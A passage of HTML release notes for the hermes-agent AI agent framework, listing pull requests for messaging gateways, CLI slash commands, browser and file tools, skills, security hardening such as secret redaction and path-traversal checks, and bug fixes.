<li><strong>setsid instead of systemd-run</strong> for <code>/update</code> command to avoid systemd permission issues (<a href="https://github.com/NousResearch/hermes-agent/pull/4104" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4104/hovercard">#4104</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4017" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4017/hovercard">#4017</a>)</li>
<li><strong>'Initializing agent...'</strong> shown on first message for better UX (<a href="https://github.com/NousResearch/hermes-agent/pull/4086" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4086/hovercard">#4086</a>)</li>
<li><strong>Allow running gateway service as root</strong> for LXC/container environments (<a href="https://github.com/NousResearch/hermes-agent/pull/4732" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4732/hovercard">#4732</a>)</li>
</ul>
<h3>Telegram</h3>
<ul>
<li><strong>32-char limit on command names</strong> with collision avoidance (<a href="https://github.com/NousResearch/hermes-agent/pull/4211" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4211/hovercard">#4211</a>)</li>
<li><strong>Priority order enforced</strong> in menu — core &gt; plugins &gt; skills (<a href="https://github.com/NousResearch/hermes-agent/pull/4023" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4023/hovercard">#4023</a>)</li>
<li><strong>Capped at 50 commands</strong> — API rejects above ~60 (<a href="https://github.com/NousResearch/hermes-agent/pull/4006" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4006/hovercard">#4006</a>)</li>
<li><strong>Skip empty/whitespace text</strong> to prevent 400 errors (<a href="https://github.com/NousResearch/hermes-agent/pull/4388" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4388/hovercard">#4388</a>)</li>
<li><strong>E2E gateway tests</strong> added (<a href="https://github.com/NousResearch/hermes-agent/pull/4497" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4497/hovercard">#4497</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pefontana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pefontana">@pefontana</a></li>
</ul>
<h3>Discord</h3>
<ul>
<li><strong>Button-based approval UI</strong> — register <code>/approve</code> and <code>/deny</code> slash commands with interactive button prompts (<a href="https://github.com/NousResearch/hermes-agent/pull/4800" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4800/hovercard">#4800</a>)</li>
<li><strong>Configurable reactions</strong> — <code>discord.reactions</code> config option to disable message processing reactions (<a href="https://github.com/NousResearch/hermes-agent/pull/4199" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4199/hovercard">#4199</a>)</li>
<li><strong>Skip reactions and auto-threading</strong> for unauthorized users (<a href="https://github.com/NousResearch/hermes-agent/pull/4387" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4387/hovercard">#4387</a>)</li>
</ul>
<h3>Slack</h3>
<ul>
<li><strong>Reply in thread</strong> — <code>slack.reply_in_thread</code> config option for threaded responses (<a href="https://github.com/NousResearch/hermes-agent/pull/4643" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4643/hovercard">#4643</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/2662" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/2662/hovercard">#2662</a>)</li>
</ul>
<h3>WhatsApp</h3>
<ul>
<li><strong>Enforce require_mention in group chats</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/4730" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4730/hovercard">#4730</a>)</li>
</ul>
<h3>Webhook</h3>
<ul>
<li><strong>Platform support fixes</strong> — skip home channel prompt, disable tool progress for webhook adapters (<a href="https://github.com/NousResearch/hermes-agent/pull/4660" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4660/hovercard">#4660</a>)</li>
</ul>
<h3>Matrix</h3>
<ul>
<li><strong>E2EE decryption hardening</strong> — request missing keys, auto-trust devices, retry buffered events (<a href="https://github.com/NousResearch/hermes-agent/pull/4083" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4083/hovercard">#4083</a>)</li>
</ul>
<hr>
<h2>🖥️ CLI &amp; User Experience</h2>
<h3>New Slash Commands</h3>
<ul>
<li><strong><code>/yolo</code></strong> — toggle dangerous command approvals on/off for the session (<a href="https://github.com/NousResearch/hermes-agent/pull/3990" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/3990/hovercard">#3990</a>)</li>
<li><strong><code>/btw</code></strong> — ephemeral side questions that don't affect the main conversation context (<a href="https://github.com/NousResearch/hermes-agent/pull/4161" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4161/hovercard">#4161</a>)</li>
<li><strong><code>/profile</code></strong> — show active profile info without leaving the chat session (<a href="https://github.com/NousResearch/hermes-agent/pull/4027" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4027/hovercard">#4027</a>)</li>
</ul>
<h3>Interactive CLI</h3>
<ul>
<li><strong>Inline diff previews</strong> for write and patch operations in the tool activity feed (<a href="https://github.com/NousResearch/hermes-agent/pull/4411" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4411/hovercard">#4411</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4423" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4423/hovercard">#4423</a>)</li>
<li><strong>TUI pinned to bottom</strong> on startup — no more large blank spaces between response and input (<a href="https://github.com/NousResearch/hermes-agent/pull/4412" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4412/hovercard">#4412</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4359" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4359/hovercard">#4359</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4398" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4398/hovercard">#4398</a>, <a href="https://github.com/NousResearch/hermes-agent/issues/4421" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4421/hovercard">#4421</a>)</li>
<li><strong><code>/history</code> and <code>/resume</code></strong> now surface recent sessions directly instead of requiring search (<a href="https://github.com/NousResearch/hermes-agent/pull/4728" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4728/hovercard">#4728</a>)</li>
<li><strong>Cache tokens shown</strong> in <code>/insights</code> overview so total adds up (<a href="https://github.com/NousResearch/hermes-agent/pull/4428" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4428/hovercard">#4428</a>)</li>
<li><strong><code>--max-turns</code> CLI flag</strong> for <code>hermes chat</code> to limit agent iterations (<a href="https://github.com/NousResearch/hermes-agent/pull/4314" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4314/hovercard">#4314</a>)</li>
<li><strong>Detect dragged file paths</strong> instead of treating them as slash commands (<a href="https://github.com/NousResearch/hermes-agent/pull/4533" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4533/hovercard">#4533</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolme">@rolme</a></li>
<li><strong>Allow empty strings and falsy values</strong> in <code>config set</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/4310" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4310/hovercard">#4310</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4277" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4277/hovercard">#4277</a>)</li>
<li><strong>Voice mode in WSL</strong> when PulseAudio bridge is configured (<a href="https://github.com/NousResearch/hermes-agent/pull/4317" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4317/hovercard">#4317</a>)</li>
<li><strong>Respect <code>NO_COLOR</code> env var</strong> and <code>TERM=dumb</code> for accessibility (<a href="https://github.com/NousResearch/hermes-agent/pull/4079" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4079/hovercard">#4079</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4066" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4066/hovercard">#4066</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a></li>
<li><strong>Correct shell reload instruction</strong> for macOS/zsh users (<a href="https://github.com/NousResearch/hermes-agent/pull/4025" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4025/hovercard">#4025</a>)</li>
<li><strong>Zero exit code</strong> on successful quiet mode queries (<a href="https://github.com/NousResearch/hermes-agent/pull/4613" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4613/hovercard">#4613</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4601" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4601/hovercard">#4601</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devorun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devorun">@devorun</a></li>
<li><strong>on_session_end hook fires</strong> on interrupted exits (<a href="https://github.com/NousResearch/hermes-agent/pull/4159" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4159/hovercard">#4159</a>)</li>
<li><strong>Profile list display</strong> reads <code>model.default</code> key correctly (<a href="https://github.com/NousResearch/hermes-agent/pull/4160" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4160/hovercard">#4160</a>)</li>
<li><strong>Browser and TTS</strong> shown in reconfigure menu (<a href="https://github.com/NousResearch/hermes-agent/pull/4041" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4041/hovercard">#4041</a>)</li>
<li><strong>Web backend priority</strong> detection simplified (<a href="https://github.com/NousResearch/hermes-agent/pull/4036" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4036/hovercard">#4036</a>)</li>
</ul>
<h3>Setup &amp; Configuration</h3>
<ul>
<li><strong>Allowed_users preserved</strong> during setup and quiet unconfigured provider warnings (<a href="https://github.com/NousResearch/hermes-agent/pull/4551" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4551/hovercard">#4551</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a></li>
<li><strong>Save API key to model config</strong> for custom endpoints (<a href="https://github.com/NousResearch/hermes-agent/pull/4202" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4202/hovercard">#4202</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4182" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4182/hovercard">#4182</a>)</li>
<li><strong>Claude Code credentials gated</strong> behind explicit Hermes config in wizard trigger (<a href="https://github.com/NousResearch/hermes-agent/pull/4210" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4210/hovercard">#4210</a>)</li>
<li><strong>Atomic writes in save_config_value</strong> to prevent config loss on interrupt (<a href="https://github.com/NousResearch/hermes-agent/pull/4298" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4298/hovercard">#4298</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4320" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4320/hovercard">#4320</a>)</li>
<li><strong>Scopes field written</strong> to Claude Code credentials on token refresh (<a href="https://github.com/NousResearch/hermes-agent/pull/4126" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4126/hovercard">#4126</a>)</li>
</ul>
<h3>Update System</h3>
<ul>
<li><strong>Fork detection and upstream sync</strong> in <code>hermes update</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/4744" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4744/hovercard">#4744</a>)</li>
<li><strong>Preserve working optional extras</strong> when one extra fails during update (<a href="https://github.com/NousResearch/hermes-agent/pull/4550" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4550/hovercard">#4550</a>)</li>
<li><strong>Handle conflicted git index</strong> during hermes update (<a href="https://github.com/NousResearch/hermes-agent/pull/4735" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4735/hovercard">#4735</a>)</li>
<li><strong>Avoid launchd restart race</strong> on macOS (<a href="https://github.com/NousResearch/hermes-agent/pull/4736" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4736/hovercard">#4736</a>)</li>
<li><strong>Missing subprocess.run() timeouts</strong> added to doctor and status commands (<a href="https://github.com/NousResearch/hermes-agent/pull/4009" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4009/hovercard">#4009</a>)</li>
</ul>
<hr>
<h2>🔧 Tool System</h2>
<h3>Browser</h3>
<ul>
<li><strong>Camofox anti-detection browser backend</strong> — local stealth browsing with auto-install via <code>hermes tools</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/4008" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4008/hovercard">#4008</a>)</li>
<li><strong>Persistent Camofox sessions</strong> with VNC URL discovery for visual debugging (<a href="https://github.com/NousResearch/hermes-agent/pull/4419" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4419/hovercard">#4419</a>)</li>
<li><strong>Skip SSRF check for local backends</strong> (Camofox, headless Chromium) (<a href="https://github.com/NousResearch/hermes-agent/pull/4292" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4292/hovercard">#4292</a>)</li>
<li><strong>Configurable SSRF check</strong> via <code>browser.allow_private_urls</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/4198" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4198/hovercard">#4198</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nils010485/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nils010485">@nils010485</a></li>
<li><strong>CAMOFOX_PORT=9377</strong> added to Docker commands (<a href="https://github.com/NousResearch/hermes-agent/pull/4340" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4340/hovercard">#4340</a>)</li>
</ul>
<h3>File Operations</h3>
<ul>
<li><strong>Inline diff previews</strong> on write and patch actions (<a href="https://github.com/NousResearch/hermes-agent/pull/4411" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4411/hovercard">#4411</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4423" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4423/hovercard">#4423</a>)</li>
<li><strong>Stale file detection</strong> on write and patch — warns when file was modified externally since last read (<a href="https://github.com/NousResearch/hermes-agent/pull/4345" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4345/hovercard">#4345</a>)</li>
<li><strong>Staleness timestamp refreshed</strong> after writes (<a href="https://github.com/NousResearch/hermes-agent/pull/4390" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4390/hovercard">#4390</a>)</li>
<li><strong>Size guard, dedup, and device blocking</strong> on read_file (<a href="https://github.com/NousResearch/hermes-agent/pull/4315" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4315/hovercard">#4315</a>)</li>
</ul>
<h3>MCP</h3>
<ul>
<li><strong>Stability fix pack</strong> — reload timeout, shutdown cleanup, event loop handler, OAuth non-blocking (<a href="https://github.com/NousResearch/hermes-agent/pull/4757" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4757/hovercard">#4757</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4462" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4462/hovercard">#4462</a>, <a href="https://github.com/NousResearch/hermes-agent/issues/2537" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/2537/hovercard">#2537</a>)</li>
</ul>
<h3>ACP (Editor Integration)</h3>
<ul>
<li><strong>Client-provided MCP servers</strong> registered as agent tools — editors pass their MCP servers to Hermes (<a href="https://github.com/NousResearch/hermes-agent/pull/4705" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4705/hovercard">#4705</a>)</li>
</ul>
<h3>Skills System</h3>
<ul>
<li><strong>Size limits for agent writes</strong> and <strong>fuzzy matching for skill patch</strong> — prevents oversized skill writes and improves edit reliability (<a href="https://github.com/NousResearch/hermes-agent/pull/4414" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4414/hovercard">#4414</a>)</li>
<li><strong>Validate hub bundle paths</strong> before install — blocks path traversal in skill bundles (<a href="https://github.com/NousResearch/hermes-agent/pull/3986" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/3986/hovercard">#3986</a>)</li>
<li><strong>Unified hermes-agent and hermes-agent-setup</strong> into single skill (<a href="https://github.com/NousResearch/hermes-agent/pull/4332" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4332/hovercard">#4332</a>)</li>
<li><strong>Skill metadata type check</strong> in extract_skill_conditions (<a href="https://github.com/NousResearch/hermes-agent/pull/4479" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4479/hovercard">#4479</a>)</li>
</ul>
<h3>New/Updated Skills</h3>
<ul>
<li><strong>research-paper-writing</strong> — full end-to-end research pipeline (replaced ml-paper-writing) (<a href="https://github.com/NousResearch/hermes-agent/pull/4654" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4654/hovercard">#4654</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a></li>
<li><strong>ascii-video</strong> — text readability techniques and external layout oracle (<a href="https://github.com/NousResearch/hermes-agent/pull/4054" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4054/hovercard">#4054</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a></li>
<li><strong>youtube-transcript</strong> updated for youtube-transcript-api v1.x (<a href="https://github.com/NousResearch/hermes-agent/pull/4455" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4455/hovercard">#4455</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/el-analista/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/el-analista">@el-analista</a></li>
<li><strong>Skills browse and search page</strong> added to documentation site (<a href="https://github.com/NousResearch/hermes-agent/pull/4500" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4500/hovercard">#4500</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IAvecilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IAvecilla">@IAvecilla</a></li>
</ul>
<hr>
<h2>🔒 Security &amp; Reliability</h2>
<h3>Security Hardening</h3>
<ul>
<li><strong>Block secret exfiltration</strong> via browser URLs and LLM responses — scans for secret patterns in URL encoding, base64, and prompt injection vectors (<a href="https://github.com/NousResearch/hermes-agent/pull/4483" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4483/hovercard">#4483</a>)</li>
<li><strong>Redact secrets from execute_code sandbox output</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/4360" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4360/hovercard">#4360</a>)</li>
<li><strong>Protect <code>.docker</code>, <code>.azure</code>, <code>.config/gh</code> credential directories</strong> from read/write via file tools and terminal (<a href="https://github.com/NousResearch/hermes-agent/pull/4305" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4305/hovercard">#4305</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4327" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4327/hovercard">#4327</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/memosr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/memosr">@memosr</a></li>
<li><strong>GitHub OAuth token patterns</strong> added to redaction + snapshot redact flag (<a href="https://github.com/NousResearch/hermes-agent/pull/4295" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4295/hovercard">#4295</a>)</li>
<li><strong>Reject private and loopback IPs</strong> in Telegram DoH fallback (<a href="https://github.com/NousResearch/hermes-agent/pull/4129" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4129/hovercard">#4129</a>)</li>
<li><strong>Reject path traversal</strong> in credential file registration (<a href="https://github.com/NousResearch/hermes-agent/pull/4316" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4316/hovercard">#4316</a>)</li>
<li><strong>Validate tar archive member paths</strong> on profile import — blocks zip-slip attacks (<a href="https://github.com/NousResearch/hermes-agent/pull/4318" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4318/hovercard">#4318</a>)</li>
<li><strong>Exclude auth.json and .env</strong> from profile exports (<a href="https://github.com/NousResearch/hermes-agent/pull/4475" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4475/hovercard">#4475</a>)</li>
</ul>
<h3>Reliability</h3>
<ul>
<li><strong>Prevent compression death spiral</strong> from API disconnects (<a href="https://github.com/NousResearch/hermes-agent/pull/4750" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4750/hovercard">#4750</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/2153" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/2153/hovercard">#2153</a>)</li>
<li><strong>Handle <code>is_closed</code> as method</strong> in OpenAI SDK — prevents false positive client closure detection (<a href="https://github.com/NousResearch/hermes-agent/pull/4416" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4416/hovercard">#4416</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4377" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4377/hovercard">#4377</a>)</li>
<li><strong>Exclude matrix from [all] extras</strong> — python-olm is upstream-broken, prevents install failures (<a href="https://github.com/NousResearch/hermes-agent/pull/4615" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4615/hovercard">#4615</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4178" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4178/hovercard">#4178</a>)</li>
<li><strong>OpenCode model routing</strong> repaired (<a href="https://github.com/NousResearch/hermes-agent/pull/4508" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4508/hovercard">#4508</a>)</li>
<li><strong>Docker container image</strong> optimized (<a href="https://github.com/NousResearch/hermes-agent/pull/4034" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4034/hovercard">#4034</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bcross/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bcross">@bcross</a></li>
</ul>
<h3>Windows &amp; Cross-Platform</h3>
<ul>
<li><strong>Voice mode in WSL</strong> with PulseAudio bridge (<a href="https://github.com/NousResearch/hermes-agent/pull/4317" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4317/hovercard">#4317</a>)</li>
<li><strong>Homebrew packaging</strong> preparation (<a href="https://github.com/NousResearch/hermes-agent/pull/4099" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4099/hovercard">#4099</a>)</li>
<li><strong>CI fork conditionals</strong> to prevent workflow failures on forks (<a href="https://github.com/NousResearch/hermes-agent/pull/4107" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4107/hovercard">#4107</a>)</li>
</ul>
<hr>
<h2>🐛 Notable Bug Fixes</h2>
<ul>
<li><strong>Gateway approval blocked agent thread</strong> — approval now blocks the agent thread like CLI does, preventing tool result loss (<a href="https://github.com/NousResearch/hermes-agent/pull/4557" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4557/hovercard">#4557</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4542" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4542/hovercard">#4542</a>)</li>
<li><strong>Compression death spiral</strong> from API disconnects — detected and halted instead of looping (<a href="https://github.com/NousResearch/hermes-agent/pull/4750" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4750/hovercard">#4750</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/2153" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/2153/hovercard">#2153</a>)</li>
<li><strong>Anthropic thinking blocks lost</strong> across tool-use turns (<a href="https://github.com/NousResearch/hermes-agent/pull/4626" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4626/hovercard">#4626</a>)</li>
<li><strong>Profile model config ignored</strong> with <code>-p</code> flag — model.model now promoted to model.default correctly (<a href="https://github.com/NousResearch/hermes-agent/pull/4160" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4160/hovercard">#4160</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4486" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4486/hovercard">#4486</a>)</li>
<li><strong>CLI blank space</strong> between response and input area (<a href="https://github.com/NousResearch/hermes-agent/pull/4412" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4412/hovercard">#4412</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4359" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4359/hovercard">#4359</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4398" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4398/hovercard">#4398</a>)</li>
<li><strong>Dragged file paths</strong> treated as slash commands instead of file references (<a href="https://github.com/NousResearch/hermes-agent/pull/4533" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4533/hovercard">#4533</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolme">@rolme</a></li>
<li><strong>Orphaned <code>&lt;/think&gt;</code> tags</strong> leaking into user-facing responses (<a href="https://github.com/NousResearch/hermes-agent/pull/4311" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4311/hovercard">#4311</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4285" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4285/hovercard">#4285</a>)</li>
<li><strong>OpenAI SDK <code>is_closed</code></strong> is a method not property — false positive client closure (<a href="https://github.com/NousResearch/hermes-agent/pull/4416" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4416/hovercard">#4416</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4377" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4377/hovercard">#4377</a>)</li>
<li><strong>MCP OAuth server</strong> could block Hermes startup instead of degrading gracefully (<a href="https://github.com/NousResearch/hermes-agent/pull/4757" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4757/hovercard">#4757</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4462" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4462/hovercard">#4462</a>)</li>
<li><strong>MCP event loop closed</strong> on shutdown with HTTP servers (<a href="https://github.com/NousResearch/hermes-agent/pull/4757" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4757/hovercard">#4757</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/2537" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/2537/hovercard">#2537</a>)</li>
